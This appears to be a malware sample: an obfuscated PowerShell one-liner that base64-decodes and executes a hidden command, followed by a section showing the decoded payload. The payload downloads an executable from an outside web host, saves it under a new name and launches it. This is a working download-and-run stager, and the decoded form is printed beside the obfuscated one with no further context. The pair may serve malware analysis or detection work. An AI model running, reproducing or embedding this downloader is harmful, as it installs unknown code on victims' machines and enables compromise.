iex([SYsTEM.text.EnCodiNG]::UTf8.GEtStrinG([SyStEm.CONvert]::frombASE64StRiNG('CihOZXctT2JqZWN0IHNZc3RFTS5ORXQud2VCY2xpRW50KS5kT3dOTE9BZGZJTEUoJ2h0dHA6Ly93b3JsZG5pdC5jb20va3VuZGVsby5leGUnLCdmbGVlYmxlLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2ZsZWVibGUuZXhlJwoK')));exit

##### B64 CONTENT #####


(New-Object sYstEM.NEt.weBcliEnt).dOwNLOAdfILE('http://worldnit.com/kundelo.exe','fleeble.exe');Start-Process 'fleeble.exe'

